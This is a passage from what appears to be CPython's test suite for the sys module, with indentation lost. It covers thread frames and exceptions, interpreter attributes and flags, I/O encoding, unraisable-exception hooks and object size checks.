filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('4Pi2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('14P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
